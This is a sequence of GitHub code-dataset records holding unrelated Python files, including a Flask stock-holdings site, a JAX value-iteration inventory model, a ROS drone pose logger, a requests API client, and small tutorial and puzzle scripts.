TemporaryRepositoryResource()\n\n    @classmethod\n    def setUpClass(cls) -> None:\n        cls.repo.setUp()\n\n    @classmethod\n    def tearDownClass(cls) -> None:\n        cls.repo.tearDown()\n\n    def test_list_archives(self):\n        archives = self.repo.repository.list_archives()\n\n        self.assertEqual(3, len(archives), 'expected three archives, got %s' % archives)\n\n        names = [path.split('/')[-1] for path in archives]\n        self.assertIn('testapp.zip', names)\n        self.assertIn('noname.zip', names)\n        self.assertIn('nomanifest.zip', names)\n\n    def test_list_apps(self):\n        apps = self.repo.repository.list_apps()\n        self.assertEqual(1, len(apps), 'expected one app, got %s' % apps)\n\n        info = apps[0]\n\n        self.assertEqual('testapp', info.name)\n        self.assertEqual('testapp', info.manifest['name'])\n\n    def test_get_app(self):\n        info = self.repo.repository.get_app('testapp')\n\n        self.assertEqual('testapp', info.name)\n        self.assertEqual('testapp', info.manifest['name'])\n\n    def test_get_app_nonexisting_app_returns_none(self):\n        info = self.repo.repository.get_app('nonexisting')\n        self.assertIsNone(info)\n\n    def test_get_app_invalid_app_returns_none(self):\n        info = self.repo.repository.get_app('noname')\n        self.assertIsNone(info)\n\n    def test_get_app_without_manifest_returns_none(self):\n        info = self.repo.repository.get_app('nomanifest')\n        self.assertIsNone(info)\n\n    def test_add_and_get(self):\n        repo = self.repo.repository\n        info = repo.add(os.path.join(this_dir, 'testapp2.zip'))\n\n        self.assertEqual('testapp2', info.name)\n        self.assertEqual({'name': 'testapp2'}, info.manifest)\n\n        actual = repo.get_app('testapp2')\n        self.assertEqual(info, actual)\n\n    def 
test_add_and_remove(self):\n repo = self.repo.repository\n info = repo.add(os.path.join(this_dir, 'testapp2.zip'))\n\n self.assertTrue(os.path.isfile(info.archive_path))\n\n deleted = repo.delete_app('testapp2')\n self.assertTrue(deleted)\n\n self.assertFalse(os.path.isfile(info.archive_path))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"edgerun/galileo","sub_path":"tests/apps/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"21894190925","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 1 00:34:52 2021\r\n\r\n@author: 0526p\r\n\"\"\"\r\n\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\n\r\nroot = Tk()\r\nroot.title('Working on Tkinter')\r\n\r\n# showinfo, showwarning, showerror, askquestion, askokcancle, askyesno\r\n\r\ndef popup():\r\n response = messagebox.showinfo('This is my Popup!', 'Hello World!')\r\n# response = messagebox.showwarning('This is my Popup!', 'Hello World!')\r\n # response = messagebox.showerror('This is my Popup!', 'Hello World!')\r\n # response = messagebox.askquestion('This is my Popup!', 'Hello World!')\r\n # response = messagebox.askokcancel('This is my Popup!', 'Hello World!')\r\n #response = messagebox.askyesno('This is my Popup!', 'Hello World!')\r\n Label(root, text = response).pack()\r\n\r\nButton(root, text = 'Popup', command = popup).pack()\r\n\r\nmainloop()\r\n","repo_name":"PrinceKumarKeshri/Python-GUI-using-Tkinter","sub_path":"10 Message Box/message boxes part 1.py","file_name":"message boxes part 1.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18566763081","text":"# built-in\nimport json\n# external\nfrom flask import Flask, render_template, make_response, redirect, url_for\nfrom flask_flatpages import FlatPages\nimport pandas as pd\n# internal\nimport config\nfrom config import change_threshold, ownership_colors, positives_colors, negatives_colors\n\nFLATPAGES_AUTO_RELOAD = True\nFLATPAGES_EXTENSION = '.md'\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\npages = FlatPages(app)\n\n@app.route(\"/set\")\n@app.route(\"/set/\")\ndef set_theme(theme=\"light\"):\n res = make_response(redirect(url_for(\"index\")))\n res.set_cookie(\"theme\", theme)\n return res\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef index():\n \"\"\"Creates the main page via Flask, reads tables by creating three lists from the json loaded dataframe and loads\n colors gradients from config \"\"\"\n\n with open(config.scrapped_json_fn, 'r') as f:\n json_df = json.load(f)\n df = pd.read_json(json_df, orient='split')\n try:\n ownership = df[['Company', 'Ownership', 'URL_Yahoo']\n ].dropna().head(n=20).values.tolist()\n except:\n ownership = df[['Company', 'Ownership']\n ].dropna().head(n=20).values.tolist()\n positives = df.sort_values(\n 'Change', ascending=False)[['Company', 'Change', 'URL_Yahoo']].dropna().head(n=20).values.tolist()\n negatives = df.sort_values(\n 'Change')[['Company', 'Change', 'URL_Yahoo']].dropna().head(n=20).values.tolist()\n\n # Most recent filing fund data generation\n with open(config.scrapped_json_fn_hedgefund, 'r') as f:\n hedge_fund_json_dg = json.load(f)\n df_recent_filing = pd.read_json(hedge_fund_json_dg, orient='split').T.rename(\n columns={0: 'link', 1: 'recent_filing_date', 2: 'current_holdings', 3: 'previous_holdings'})\n 
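# keep only the fund(s) whose filing date equals the newest date in the frame\n    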
df_recent_filing_head = df_recent_filing[\n df_recent_filing.recent_filing_date == df_recent_filing.recent_filing_date.max()].head(1)\n most_recent_filing_date = df_recent_filing_head.recent_filing_date.tolist()[\n 0]\n most_recent_filing_url = df_recent_filing_head.link.tolist()[0]\n most_recent_filing_word_list = df_recent_filing_head.index.tolist()[\n 0].split(' ')\n max_fund_name_characters = 10\n most_recent_filing_fund = ''\n for word in most_recent_filing_word_list:\n if len(most_recent_filing_fund) < max_fund_name_characters:\n most_recent_filing_fund = most_recent_filing_fund + ' ' + word\n else:\n break\n\n return render_template('index.html',\n ownership=ownership,\n positives=positives,\n negatives=negatives,\n ownership_colors=ownership_colors,\n positives_colors=positives_colors,\n negatives_colors=negatives_colors,\n most_recent_filing_url=most_recent_filing_url,\n most_recent_filing_firm=most_recent_filing_fund,\n most_recent_filing_date=most_recent_filing_date)\n\n\n@app.route('//')\ndef page(path):\n \"\"\"Generates blog posts dynamically from markdown pages within the pages /folder\"\"\"\n page = pages.get_or_404(path)\n return render_template('page.html', page=page)\n\n\n@app.route(\"/data_byHedgeFund\", methods=['GET', 'POST'])\ndef index_by_hedgefund():\n \"\"\"Creates the data by hedge fund page\"\"\"\n\n # Most recent filing fund data generation\n with open(config.scrapped_json_fn_hedgefund, 'r') as f:\n hedge_fund_json_dg = json.load(f)\n df_recent_filing = pd.read_json(hedge_fund_json_dg, orient='split').T.rename(\n columns={0: 'link', 1: 'recent_filing_date', 2: 'current_holdings', 3: 'previous_holdings'})\n\n try:\n filings_by_fund = df_recent_filing.reset_index().rename(columns={'index': 'fund_name'})[['fund_name', 'recent_filing_date', 'current_holdings', 'previous_holdings', 'link']\n ].dropna().head(n=50).values.tolist()\n for i, fund_filing in enumerate(filings_by_fund):\n filings_by_fund_stocksOnly = [x['Company'] for x in fund_filing[2]]\n filings_by_fund[i].insert(6, filings_by_fund_stocksOnly)\n # print(filings_by_fund[0][5])\n except Exception as e:\n print('Error Pulling outt Filings by Fund', flush=True)\n print(e, flush=True)\n pass\n return render_template('index_byHedgeFund.html',\n filings_by_fund=filings_by_fund)\n\n\n@app.route(\"/shorts\", methods=['GET', 'POST'])\ndef index_shorts():\n \"\"\"Lists Options\"\"\"\n # try:\n with open(config.scrapped_json_fn_options, 'r') as f:\n hedge_fund_json_dg = json.load(f)\n df_recent_options = pd.read_json(hedge_fund_json_dg, orient='split')\n df_puts_only = df_recent_options.drop_duplicates(\n subset=['CUSIP', 'HF_Name'], keep=False)\n df_puts_only = df_puts_only[\n (df_puts_only['Option_Type'] == 'Put') & (df_puts_only['HF_Name'] != 'CAPITAL FUND MANAGEMENT')]\n # df_puts_only.sort_values('Company').reset_index().tail(100)\n df_puts_only_by_stock = df_puts_only.groupby(['CUSIP', 'Company', 'Option_Type'], as_index=False).agg(\n {'Shares': 'sum', 'Value': 'sum', 'HF_Name': 'unique'}).sort_values('Value', ascending=False)\n puts_only_by_stock = df_puts_only_by_stock[['Company', 'Option_Type', 'Shares', 'Value', 'HF_Name']\n ].dropna().head(n=75).values.tolist()\n # except Exception as e:\n # print('Error Pulling outt Options by Stock', flush=True)\n # print(e, flush=True)\n # pass\n return render_template('index_options_byStock.html',\n put_options_by_stock=puts_only_by_stock)\n\n\n@app.route(\"/blog\")\ndef blog():\n \"\"\"Generates a list of all blog posts dynamically from markdown pages within the 
pages /folder\"\"\"\n return render_template('blog.html',\n pages=pages)\n\n\n@app.route(\"/about\")\ndef about():\n fund_link_dictionary_list = [[key, val]\n for key, val in config.fund_dict.items()]\n return render_template('about.html',\n fund_name_link_zipped_list=fund_link_dictionary_list)\n\n\n@app.route(\"/sitemap.xml\")\ndef sitemap():\n return render_template('sitemap.xml')\n\n\n@app.route(\"/ads.txt\")\ndef ads_txt():\n return render_template('ads.txt')\n\n\nif __name__ == \"__main__\":\n app.run(threaded=True, debug=True)\n","repo_name":"whs2k/stockFries","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32125788777","text":"f = open(\"spiciesURL.txt\",\"r\")\ng = open(\"StreptococcusURL.txt\",\"w\")\nh = open(\"8genusURL.txt\",\"w\")\n\nff = f.readlines()\nnff = len(ff)\n\nfor i in range(0,nff):\n if \"-\"*10 in ff[i]:\n p = i\n\nfor i in range(0,p):\n g.write(ff[i])\nfor i in range(p+1,nff):\n h.write(ff[i])\n\n# spiciesURL에 있는 전체 URL에서, Streptococcus들의 URL은 StreptococcusURL에,\n# 다른 genus의 URL은 8genusURL에 쓰기\n\nf.close()\ng.close()\nh.close()\n","repo_name":"limchanyoung1116/probiotics-geneticfeature","sub_path":"genome/2. speciesURL/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32367646740","text":"import numpy as np\nimport pandas as pd\nimport jax\nimport jax.numpy as jnp\nimport itertools\nimport logging\nfrom viso_jax.value_iteration.base_vi_runner import ValueIterationRunner\nfrom pathlib import Path\nfrom jax import tree_util\nfrom typing import Union, Dict, Tuple, List, Optional\nimport chex\nfrom datetime import datetime\n\n# Enable logging\nlog = logging.getLogger(\"ValueIterationRunner\")\n\n# NOTE: in Hendrix et al (2019), oldest stock on LHS of inventory vector\n# Here, for consistency with De Moor and Mirjalili cases, oldest stock\n# is now on the RHS of the inventory vector\n\n\nclass HendrixPerishableOneProductVIR(ValueIterationRunner):\n def __init__(\n self,\n max_useful_life: int,\n demand_poisson_mean: float,\n variable_order_cost: float,\n sales_price: float,\n max_order_quantity: int,\n max_batch_size: int,\n epsilon: float,\n gamma: float = 1,\n output_directory: Optional[Union[str, Path]] = None,\n checkpoint_frequency: int = 0,\n resume_from_checkpoint: Union[bool, str] = False,\n ):\n\n \"\"\"Class to run value iteration for hendrix_perishable_one_product scenario\n\n Args:\n max_useful_life: maximum useful life of product, m >= 1\n demand_poission_mean: mean of Poisson distribution that models demand\n variable_order_cost: cost per unit ordered\n sales_price: revenue per unit issued to meet demand\n max_order_quantity: maximum order quantity\n max_batch_size: Maximum number of states to update in parallel using vmap, will depend on GPU memory\n epsilon: Convergence criterion for value iteration\n gamma: Discount factor\n output_directory: Directory to save output to, if None, will create a new directory\n checkpoint_frequency: Frequency with which to save checkpoints, 0 for no checkpoints\n resume_from_checkpoint: If False, start from scratch; if filename, resume from checkpoint\n\n \"\"\"\n assert (\n max_useful_life >= 1\n ), \"max_useful_life must be greater than or equal to 1\"\n self.max_useful_life = max_useful_life\n self.demand_poisson_mean = 
demand_poisson_mean\n        self.variable_order_cost = variable_order_cost\n        self.sales_price = sales_price\n        self.max_order_quantity = max_order_quantity\n\n        self.max_batch_size = max_batch_size\n        self.epsilon = epsilon\n        self.gamma = gamma\n\n        if output_directory is None:\n            now = datetime.now()\n            date = now.strftime(\"%Y-%m-%d\")\n            time = now.strftime(\"%H-%M-%S\")\n            self.output_directory = Path(f\"vi_output/{date}/{time}\").absolute()\n        else:\n            self.output_directory = Path(output_directory).absolute()\n\n        self.checkpoint_frequency = checkpoint_frequency\n        if self.checkpoint_frequency > 0:\n            self.cp_path = self.output_directory / \"checkpoints\"\n            self.cp_path.mkdir(parents=True, exist_ok=True)\n\n        self.resume_from_checkpoint = resume_from_checkpoint\n\n        self._setup()\n        log.info(f\"Max order quantity: {self.max_order_quantity}\")\n\n    def _setup_before_states_actions_random_outcomes_created(self):\n        \"\"\"Calculate the maximum stock and maximum demand to be considered\"\"\"\n        self.max_stock = self.max_order_quantity * self.max_useful_life\n        self.max_demand = self.max_useful_life * (self.max_order_quantity + 2)\n\n    def _setup_after_states_actions_random_outcomes_created(self):\n        \"\"\"Set up functions to calculate the expected sales revenue, used\n        for the initial estimate of the value function\"\"\"\n\n        self._calculate_expected_sales_revenue_vmap_states = jax.vmap(\n            self._calculate_expected_sales_revenue\n        )\n        self._calculate_expected_sales_revenue_state_batch_jit = jax.jit(\n            self._calculate_expected_sales_revenue_state_batch\n        )\n        self._calculate_expected_sales_revenue_scan_state_batches_pmap = jax.pmap(\n            self._calculate_expected_sales_revenue_scan_state_batches, in_axes=(None, 0)\n        )\n\n    def generate_states(self) -> Tuple[List[Tuple], Dict[str, int]]:\n        \"\"\"Returns a tuple consisting of a list of all possible states as tuples and a\n        dictionary that maps descriptive names of the components of the state to indices\n        that can be used to extract them from an individual state\"\"\"\n        states = self._generate_states_single_product(self.max_order_quantity)\n\n        # Use this dict to access specific parts of the state\n        state_component_idx_dict = self._generate_one_product_state_component_idx_dict()\n        return states, state_component_idx_dict\n\n    def create_state_to_idx_mapping(self) -> chex.Array:\n        \"\"\"Returns an array that maps from a state (represented as a tuple) to its index\n        in the state array\"\"\"\n        state_to_idx = np.zeros(\n            tuple([self.max_order_quantity + 1] * self.max_useful_life)\n        )\n        for idx, state in enumerate(self.state_tuples):\n            state_to_idx[state] = idx\n        state_to_idx = jnp.array(state_to_idx, dtype=jnp.int32)\n        return state_to_idx\n\n    def generate_actions(self) -> Tuple[chex.Array, List[str]]:\n        \"\"\"Returns a tuple consisting of an array of all possible actions and a\n        list of descriptive names for each action dimension\"\"\"\n        actions = jnp.arange(0, self.max_order_quantity + 1)\n        action_labels = [\"order_quantity\"]\n        return actions, action_labels\n\n    def generate_possible_random_outcomes(self) -> Tuple[chex.Array, Dict[str, int]]:\n        \"\"\"Returns a tuple consisting of an array of all possible random outcomes and a dictionary\n        that maps descriptive names of the components of a random outcome to indices that can be\n        used to extract them from an individual random outcome.\"\"\"\n        # The transition depends on the number of units issued\n        issued = jnp.arange(0, self.max_stock + 1)\n        # Use this dict to access specific elements of the random outcomes\n        pro_component_idx_dict = 
{}\n pro_component_idx_dict[\"issued\"] = 0\n\n return issued, pro_component_idx_dict\n\n def deterministic_transition_function(\n self,\n state: chex.Array,\n action: Union[int, chex.Array],\n random_outcome: chex.Array,\n ) -> Tuple[chex.Array, float]:\n \"\"\"Returns the next state and single-step reward for the provided state, action and random combination\"\"\"\n stock_after_issue = self._issue_fifo(\n state,\n random_outcome,\n )\n\n next_state = jnp.hstack(\n [action, stock_after_issue[0 : self.max_useful_life - 1]]\n )\n\n # Pass through the random outcome (units issued)\n single_step_reward = self._calculate_single_step_reward(\n state, action, random_outcome\n )\n\n return (next_state, single_step_reward)\n\n def get_probabilities(\n self,\n state: chex.Array,\n action: Union[int, chex.Array],\n possible_random_outcomes: chex.Array,\n ) -> chex.Array:\n \"\"\"Returns an array of the probabilities of each possible random outcome for the provides state-action pair\"\"\"\n\n stock = jnp.sum(state)\n\n # Transition probabilities if demand for a less than or equal to stock\n demand_upto_max_stock = jnp.arange(0, self.max_stock + 1)\n prob_demand = jax.scipy.stats.poisson.pmf(\n jnp.arange(self.max_stock + 1), self.demand_poisson_mean\n )\n issued_probs = prob_demand * (jnp.arange(self.max_stock + 1) <= stock)\n\n # Plus component for demand greater than current stock, issue all stock\n prob_demand_gt_stock = 1 - jax.scipy.stats.poisson.cdf(\n stock, self.demand_poisson_mean\n )\n issued_probs = issued_probs.at[stock].add(prob_demand_gt_stock)\n\n return issued_probs\n\n def calculate_initial_values(self) -> chex.Array:\n \"\"\"Returns an array of the initial values for each state, based on the\n expected one step ahead sales revenue\"\"\"\n\n padded_batched_expected_sales_revenue = (\n self._calculate_expected_sales_revenue_scan_state_batches_pmap(\n None, self.padded_batched_states\n )\n )\n\n expected_sales_revenue = self._unpad(\n padded_batched_expected_sales_revenue.reshape(-1), self.n_pad\n )\n\n return expected_sales_revenue\n\n def check_converged(\n self, iteration: int, min_iter: int, V: chex.Array, V_old: chex.Array\n ) -> bool:\n \"\"\"Convergence check to determine whether to stop value iteration. 
This convergence check\n is testing for the convergence of the policy, and will stop value iteration\n when the values for every state are changing by approximately the same amount.\"\"\"\n delta = V - V_old\n max_delta = jnp.max(delta)\n min_delta = jnp.min(delta)\n delta_diff = max_delta - min_delta\n if delta_diff < self.epsilon:\n if iteration >= min_iter:\n log.info(f\"Converged on iteration {iteration}\")\n log.info(f\"Max delta: {max_delta}\")\n log.info(f\"Min delta: {min_delta}\")\n return True\n else:\n log.info(\n f\"Difference below epsilon on iteration {iteration}, but min iterations not reached\"\n )\n return False\n else:\n log.info(f\"Iteration {iteration}, delta diff: {delta_diff}\")\n return False\n\n ### Supporting functions for self.generate_states() ###\n def _generate_states_single_product(self, max_order_quantity: int) -> List[Tuple]:\n \"\"\"Returns possible states, as a list of tuples\"\"\"\n possible_orders = range(0, max_order_quantity + 1)\n product_arg = [possible_orders] * self.max_useful_life\n return list(itertools.product(*product_arg))\n\n def _generate_one_product_state_component_idx_dict(self) -> Dict[str, int]:\n \"\"\"Returns a dictionary that maps descriptive names of the components of a state\n to indices of the elements in the state array\"\"\"\n state_component_idx_dict = {}\n state_component_idx_dict[\"stock_start\"] = 0\n state_component_idx_dict[\"stock_len\"] = self.max_useful_life\n state_component_idx_dict[\"stock_stop\"] = (\n state_component_idx_dict[\"stock_start\"]\n + state_component_idx_dict[\"stock_len\"]\n )\n return state_component_idx_dict\n\n ### Supporting functions for self.deterministic_transition_function() ###\n def _issue_fifo(self, opening_stock: chex.Array, demand: int) -> chex.Array:\n \"\"\"Issue stock using FIFO policy\"\"\"\n # Oldest stock on RHS of vector, so reverse\n _, remaining_stock = jax.lax.scan(\n self._issue_one_step, demand, opening_stock, reverse=True\n )\n return remaining_stock\n\n def _issue_one_step(\n self, remaining_demand: chex.Array, stock_element: int\n ) -> Tuple[int, int]:\n \"\"\"Fill demand with stock of one age, representing one element in the state\"\"\"\n remaining_stock = (stock_element - remaining_demand).clip(0)\n remaining_demand = (remaining_demand - stock_element).clip(0)\n return remaining_demand, remaining_stock\n\n def _calculate_single_step_reward(\n self,\n state: chex.Array,\n action: Union[int, chex.Array],\n transition_function_reward_output: chex.Array,\n ) -> float:\n \"\"\"Calculate the single step reward based on the provided state, action and\n output from the transition function\"\"\"\n cost = action * self.variable_order_cost\n revenue = transition_function_reward_output * self.sales_price\n return revenue - cost\n\n ##### Support functions for self._calculate_single_step_reward() #####\n def _calculate_sales_revenue_for_possible_random_outcomes(self) -> chex.Array:\n \"\"\"Calculate the sales revenue for each possible random outcome of demand\"\"\"\n return self.possible_random_outcomes * self.sales_price\n\n def _calculate_expected_sales_revenue(self, state: chex.Array) -> float:\n \"\"\"Calculate the expected sales revenue for a given state\"\"\"\n issued_probabilities = self.get_probabilities(state, None, None)\n expected_sales_revenue = issued_probabilities.dot(\n self._calculate_sales_revenue_for_possible_random_outcomes()\n )\n return expected_sales_revenue\n\n def _calculate_expected_sales_revenue_state_batch(\n self, carry: None, batch_of_states: chex.Array\n ) 
-> Tuple[None, chex.Array]:\n        \"\"\"Calculate the expected sales revenue for a batch of states\"\"\"\n        revenue = self._calculate_expected_sales_revenue_vmap_states(batch_of_states)\n        return carry, revenue\n\n    def _calculate_expected_sales_revenue_scan_state_batches(\n        self, carry: None, padded_batched_states: chex.Array\n    ) -> chex.Array:\n        \"\"\"Calculate the expected sales revenue for multiple batches of states, using jax.lax.scan to loop over the batches of states\"\"\"\n        carry, revenue_padded = jax.lax.scan(\n            self._calculate_expected_sales_revenue_state_batch_jit,\n            carry,\n            padded_batched_states,\n        )\n        return revenue_padded\n\n    ### Utility functions to set up pytree for class ###\n    # See https://jax.readthedocs.io/en/latest/faq.html#strategy-3-making-customclass-a-pytree\n\n    def _tree_flatten(self):\n        children = (\n            self.state_to_idx_mapping,\n            self.states,\n            self.padded_batched_states,\n            self.actions,\n            self.possible_random_outcomes,\n            self.V_old,\n            self.iteration,\n        ) # arrays / dynamic values\n        aux_data = {\n            \"max_useful_life\": self.max_useful_life,\n            \"demand_poisson_mean\": self.demand_poisson_mean,\n            \"variable_order_cost\": self.variable_order_cost,\n            \"sales_price\": self.sales_price,\n            \"max_order_quantity\": self.max_order_quantity,\n            \"batch_size\": self.batch_size,\n            \"max_batch_size\": self.max_batch_size,\n            \"n_devices\": self.n_devices,\n            \"epsilon\": self.epsilon,\n            \"gamma\": self.gamma,\n            \"checkpoint_frequency\": self.checkpoint_frequency,\n            \"cp_path\": self.cp_path,\n            \"resume_from_checkpoint\": self.resume_from_checkpoint,\n            \"max_stock\": self.max_stock,\n            \"max_demand\": self.max_demand,\n            \"state_tuples\": self.state_tuples,\n            \"action_labels\": self.action_labels,\n            \"state_component_idx_dict\": self.state_component_idx_dict,\n            \"pro_component_idx_dict\": self.pro_component_idx_dict,\n            \"n_pad\": self.n_pad,\n            \"output_info\": self.output_info,\n        } # static values\n        return (children, aux_data)\n\n\ntree_util.register_pytree_node(\n    HendrixPerishableOneProductVIR,\n    HendrixPerishableOneProductVIR._tree_flatten,\n    HendrixPerishableOneProductVIR._tree_unflatten,\n)\n","repo_name":"joefarrington/viso_jax","sub_path":"viso_jax/scenarios/hendrix_perishable_one_product/vi_runner.py","file_name":"vi_runner.py","file_ext":"py","file_size_in_byte":15187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31811699145","text":"import requests\n\nclass APIClient(object):\n    def __init__(self, timeout=10):\n        self.timeout = timeout\n        self.session = requests.Session()\n\n    def get(self, url, params=None, headers=None):\n        try:\n            response = self.session.get(url, params=params, headers=headers, timeout=self.timeout)\n            response.raise_for_status() # check the response status code; raise if it is not 2xx\n            return response\n        except requests.RequestException as e:\n            print(f\"Request raised an exception: {e}\")\n            raise\n\n    def post(self, url, data=None, headers=None):\n        try:\n            response = self.session.post(url, json=data, headers=headers, timeout=self.timeout)\n            response.raise_for_status() # check the response status code; raise if it is not 2xx\n            return response\n        except requests.RequestException as e:\n            print(f\"Request raised an exception: {e}\")\n            raise\n# url = \"https://fanyi-api.baidu.com/api/trans/vip/translate\"\n# url = \"https://fanyi-api.baidu.com/api/trans/vip/translate?q=test&from=en&to=zh&appid=20210103000662374&salt=555&sign=6920f89156766aece32ac15afcd6ff3b\"\n#\n# params = {\n#     \"q\": \"test\",\n#     \"from\": \"en\",\n#     \"to\": \"zh\",\n#     \"appid\": \"20210103000662374\",\n#     \"salt\": \"1435660288\",\n#     \"sign\": 
\"6920f89156766aece32ac15afcd6ff3b\"\n# }\n#\n# p = APIClient()\n# print(p.get(url).text)","repo_name":"dandanyang123/AutoTest-api-app-web","sub_path":"Common/BaseApi.py","file_name":"BaseApi.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31308077265","text":"from vyper import ast as vy_ast\n\nfrom vyro.cairo.import_directives import add_builtin_to_module\nfrom vyro.cairo.nodes import CairoIfTest\nfrom vyro.cairo.types import FeltDefinition\nfrom vyro.transpiler.context import ASTContext\nfrom vyro.transpiler.utils import (\n create_assign_node,\n create_name_node,\n get_scope,\n insert_statement_before,\n set_parent,\n)\nfrom vyro.transpiler.visitor import BaseVisitor\n\n\nclass IfHandlerVisitor(BaseVisitor):\n def visit_FunctionDef(self, node: vy_ast.FunctionDef, ast: vy_ast.Module, context: ASTContext):\n # Extract `If` nodes to prevent infinite loop\n if_nodes = node.get_descendants(vy_ast.If)\n for if_node in if_nodes:\n self.visit_If(if_node, ast, context)\n\n def visit_If(self, node: vy_ast.If, ast: vy_ast.Module, context: ASTContext):\n\n # Assign test condition to a temporary variable in an `Assign` statement\n # before `If` node\n condition = node.test\n node._children.remove(node.test)\n\n temp_name_node = create_name_node(context)\n temp_name_node._metadata[\"type\"] = FeltDefinition()\n\n assign_condition_node = create_assign_node(context, [temp_name_node], condition)\n\n scope_node, scope_node_body = get_scope(node)\n insert_statement_before(assign_condition_node, node, scope_node, scope_node_body)\n\n # Replace 'test' for `If` node with `CairoIfTest` of temporary variable to TRUE\n temp_name_node_dup = create_name_node(context, name=temp_name_node.id)\n temp_name_node_dup._metadata[\"type\"] = FeltDefinition()\n\n true_constant_node = create_name_node(context, name=\"TRUE\")\n true_constant_node._metadata[\"type\"] = FeltDefinition()\n add_builtin_to_module(ast, \"TRUE\")\n\n compare_node = CairoIfTest(\n node_id=context.reserve_id(),\n ops=[vy_ast.Eq()],\n left=temp_name_node_dup,\n comparators=[true_constant_node],\n ast_type=\"Compare\",\n )\n set_parent(temp_name_node_dup, compare_node)\n set_parent(true_constant_node, compare_node)\n\n node.test = compare_node\n set_parent(compare_node, node)\n","repo_name":"tserg/vyro","sub_path":"vyro/transpiler/passes/if_handler.py","file_name":"if_handler.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"31103128790","text":"#!/usr/bin/env python\nimport roslib\nimport sys\nimport rospy\nimport rospkg\nfrom geometry_msgs.msg import PoseStamped\nfrom rospy.impl import init\n\nfrom image_tools import getGSD\nfrom std_msgs.msg import Float32\nfrom std_srvs.srv import Trigger, TriggerResponse\nfrom droneinfo.srv import StartLogging, StartLoggingResponse\n\nimport time\nimport csv\nfrom quaternion import *\n\n\nclass droneinfo:\n def __init__(self):\n # Publish to the MarkerLocator's original topic\n self.gsd = rospy.Publisher(\"/droneinfo/gsd\", Float32, queue_size=10)\n self.currGSD = 0\n\n # Parameters depending on camera\n self.fov = 1.3962634\n self.pixel_width = 800\n\n # Service handler\n self.s_start_log = rospy.Service(\"/droneinfo/start_logging\", StartLogging, self.startLogHandler, buff_size=10)\n self.s_stop_log = rospy.Service(\"/droneinfo/stop_logging\", Trigger, self.stopLogHandler, buff_size=10)\n\n # loggin 
parameters\n        self.timeStart = rospy.get_time()\n        self.logging = False\n        self.userSetLogName = \"\"\n        rospack = rospkg.RosPack()\n        self.path = rospack.get_path('droneinfo')\n        self.logfile = self.path + \"/logs/log\" + \"_\" + self.userSetLogName + time.strftime(\n            \"%d_%m_%Y\") + \"_\" + time.strftime(\"%H_%M_%S\") + \".csv\"\n        # log in memory\n        self.loglist = []\n\n        # Subscribe to get height\n        self.image_sub = rospy.Subscriber(\"/mavros/local_position/pose\", PoseStamped, self.callback)\n\n    # need to use function to get latest changes set from services. Also updates self.logname\n    def updateLogName(self):\n        self.logfile = self.path + \"/logs/log\" + \"_\" + self.userSetLogName + time.strftime(\n            \"%d_%m_%Y\") + \"_\" + time.strftime(\"%H_%M_%S\") + \".csv\"\n\n    def startLogHandler(self, req):\n        # if req != empty, change logfile name\n        if req.logname != \"\":\n            self.userSetLogName = req.logname + \"_\"\n\n        # update logname for correct time and custom tag\n        self.updateLogName()\n        self.logging = True\n        self.loglist = []\n        return StartLoggingResponse(success=True, message=\"Logging Started\")\n\n    def stopLogHandler(self, req):\n\n        # always stop logging\n        self.logging = False\n\n        if len(self.loglist) == 0:\n            print(\"Log is empty, nothing to save\")\n            return TriggerResponse(success=False, message=\"Log is empty, nothing to save\")\n\n        with open(self.logfile, 'w') as csvfile:\n            spamwriter = csv.writer(csvfile, delimiter=',')\n            for val in self.loglist:\n                spamwriter.writerow(val)\n\n        # clear log in memory\n        self.loglist = []\n        return TriggerResponse(success=True, message=\"Logging Stopped and saved to file: \" + self.logfile)\n\n    def callback(self, data):\n        height = data.pose.position.z\n        self.currGSD = getGSD(height, self.fov, self.pixel_width)\n        self.gsd.publish(self.currGSD)\n\n        # save to log file in memory\n        if self.logging:\n            q = data.pose.orientation\n            _, _, yaw = quaternion_to_euler_angle(q.w, q.x, q.y, q.z)\n            deltaT = rospy.get_time() - self.timeStart\n            \n            data = [deltaT, data.pose.position.x, data.pose.position.y, data.pose.position.z, yaw]\n            self.loglist.append(data)\n\n    def shutdownHandler(self):\n        self.stopLogHandler(None)\n\n        # shutdown services\n        self.s_start_log.shutdown()\n        self.s_stop_log.shutdown()\n        print(\"Shutting down\")\n\n\ndef main():\n    rospy.init_node('droneinfo', anonymous=True)\n    rospy.sleep(1)\n\n    di = droneinfo()\n\n    rospy.on_shutdown(di.shutdownHandler)\n\n    rospy.spin()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Crowdedlight/ROVI2","sub_path":"Excercises/Miniproject3/Olliver/catkin_ws/src/droneinfo/src/droneinfo/infonode.py","file_name":"infonode.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"16555869722","text":"class Solution(object):\n    def findContentChildren(self, g, s):\n        \"\"\"\n        :type g: List[int]\n        :type s: List[int]\n        :rtype: int\n        \"\"\"\n        # Give the biggest cookie to the greediest child\n        # If it does not fit, move on to a less greedy child\n        # If it fits, hand it over and count it\n        # Break early once the cookies run out to avoid an error\n        g.sort(reverse=True)\n        s.sort()\n        result = 0\n        for i in g:\n            if not s:\n                break\n            if i <= s[-1]:\n                